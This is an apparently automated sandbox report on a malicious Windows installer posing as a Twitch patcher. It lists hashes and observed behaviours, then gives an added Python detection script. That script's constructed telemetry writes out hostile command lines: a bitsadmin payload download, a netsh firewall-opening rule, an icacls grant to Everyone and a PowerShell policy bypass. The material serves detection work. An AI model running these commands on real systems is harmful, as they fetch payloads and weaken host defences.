General

  • Target

    Twitch-Patcheur-30.2.3-Windows-Installer.exe

  • Size

    346KB

  • Sample

    240817-xbpspatcqp

  • MD5

    db9793f028e6bb71003f7d75673de99e

  • SHA1

    03a31b6cb26c9e6deca14d2cc7e71f67bf61c986

  • SHA256

    3b36c155ce5aa68a3100ad8337ba880b6a3f9facfd254531317fec0731db244d

  • SHA512

    5dc8a769771c20cffa753e6bcf04fa5a7113ecef3b97818c924c2843f820b94746137285dc900d0508c15a1fe341624d996115bdeea398e4f4b1a34acee0c34f

  • SSDEEP

    6144:xt5hBPi0BW69hd1MMdxPe9N9uA069TB4kOAF4fffNJmfg+O+j8kwCo1:xtzww69T+kHF4fffNJmfg+O+jfLo1

Malware Config

Targets

    • Target

      Twitch-Patcheur-30.2.3-Windows-Installer.exe


    • Blocklisted process makes network request

    • Download via BitsAdmin

    • Modifies Windows Firewall

    • Possible privilege escalation attempt

    • Drops startup file

    • Loads dropped DLL

    • Modifies file permissions

    • Command and Scripting Interpreter: PowerShell

      Runs commands through powershell.exe.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.
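As an added example that is not part of this sandbox report, the following Python replays the behaviours listed above against constructed endpoint telemetry (process creation, file write and network events in a Sysmon-like shape) and checks a file's SHA256 against the hash the report gives. The event contents, the `.invalid` URLs, the IP-lookup hostnames and the Startup-folder pattern are assumptions chosen for illustration, not observations from this run.

```python
"""Added example, not part of the sandbox report. It replays the behaviours
the report lists for this sample against constructed endpoint telemetry and
checks a file's SHA256 against the hash the report gives. The events, hosts
and paths below are constructed for illustration, not taken from the run."""
import hashlib
import re
from typing import Dict, List

# SHA256 of the submitted file, copied from the report above.
REPORT_SHA256 = "3b36c155ce5aa68a3100ad8337ba880b6a3f9facfd254531317fec0731db244d"

# One rule per report signature. Process rules match the command line, file
# rules the written path, network rules the destination host. The hostnames
# and path patterns are assumptions chosen for the example.
PROCESS_RULES = {
    "Download via BitsAdmin": re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I),
    "Modifies Windows Firewall": re.compile(r"\bnetsh(\.exe)?\b.*\badvfirewall\b", re.I),
    "Modifies file permissions": re.compile(r"\b(icacls|cacls|takeown)(\.exe)?\b", re.I),
    "Command and Scripting Interpreter: PowerShell": re.compile(r"\bpowershell(\.exe)?\b", re.I),
}
FILE_RULES = {
    "Drops startup file": re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I),
}
NETWORK_RULES = {
    "Looks up external IP address via web service": {"api.ipify.org", "ip-api.com", "icanhazip.com"},
}

# Constructed telemetry in a Sysmon-like shape (not real sandbox output).
SAMPLE_EVENTS = [
    {"type": "process", "pid": 1204, "ppid": 900,
     "cmdline": "C:\\Users\\user\\Desktop\\Twitch-Patcheur-30.2.3-Windows-Installer.exe"},
    {"type": "process", "pid": 1320, "ppid": 1204,
     "cmdline": "cmd.exe /c bitsadmin /transfer job1 /download /priority high "
                "http://files.example.invalid/p.dll C:\\Users\\user\\AppData\\Local\\Temp\\p.dll"},
    {"type": "process", "pid": 1344, "ppid": 1204,
     "cmdline": "netsh advfirewall firewall add rule name=\"Updater\" dir=in action=allow "
                "program=\"C:\\Users\\user\\AppData\\Local\\Temp\\p.exe\""},
    {"type": "process", "pid": 1360, "ppid": 1204,
     "cmdline": "icacls C:\\Users\\user\\AppData\\Local\\Temp\\p.dll /grant Everyone:F"},
    {"type": "process", "pid": 1388, "ppid": 1204,
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\user\\AppData\\Local\\Temp\\s.ps1"},
    {"type": "file", "pid": 1204,
     "path": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\p.lnk"},
    {"type": "network", "pid": 1388, "host": "api.ipify.org", "port": 443},
    {"type": "network", "pid": 1388, "host": "update.example.invalid", "port": 443},
]


def match_signatures(events: List[dict]) -> Dict[str, List[int]]:
    """Return {signature name: [pids that triggered it]} for the given events."""
    hits: Dict[str, List[int]] = {}
    for ev in events:
        if ev["type"] == "process":
            for name, rx in PROCESS_RULES.items():
                if rx.search(ev["cmdline"]):
                    hits.setdefault(name, []).append(ev["pid"])
        elif ev["type"] == "file":
            for name, rx in FILE_RULES.items():
                if rx.search(ev["path"]):
                    hits.setdefault(name, []).append(ev["pid"])
        elif ev["type"] == "network":
            for name, hosts in NETWORK_RULES.items():
                if ev["host"].lower() in hosts:
                    hits.setdefault(name, []).append(ev["pid"])
    return hits


def child_processes_of(events: List[dict], root_pid: int) -> List[int]:
    """PIDs spawned directly by root_pid; shows which hits chain back to the installer."""
    return [ev["pid"] for ev in events if ev["type"] == "process" and ev.get("ppid") == root_pid]


def sha256_matches_report(data: bytes) -> bool:
    """True when the bytes hash to the SHA256 the report lists for the sample."""
    return hashlib.sha256(data).hexdigest() == REPORT_SHA256


if __name__ == "__main__":
    for name, pids in match_signatures(SAMPLE_EVENTS).items():
        print(f"{name}: pids {pids}")
    print("installer children:", child_processes_of(SAMPLE_EVENTS, 1204))
    print("constructed bytes match report hash:", sha256_matches_report(b"not the sample"))
```

The rules are deliberately narrow (command-line and path substrings) so that each hit maps to one of the report's signature names; the parent-PID walk is what ties a `bitsadmin` or `netsh` hit back to the installer rather than to an unrelated admin session. Replace `SAMPLE_EVENTS` with real process-creation, file and DNS events to run it against your own telemetry.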

MITRE ATT&CK Enterprise v15

Tasks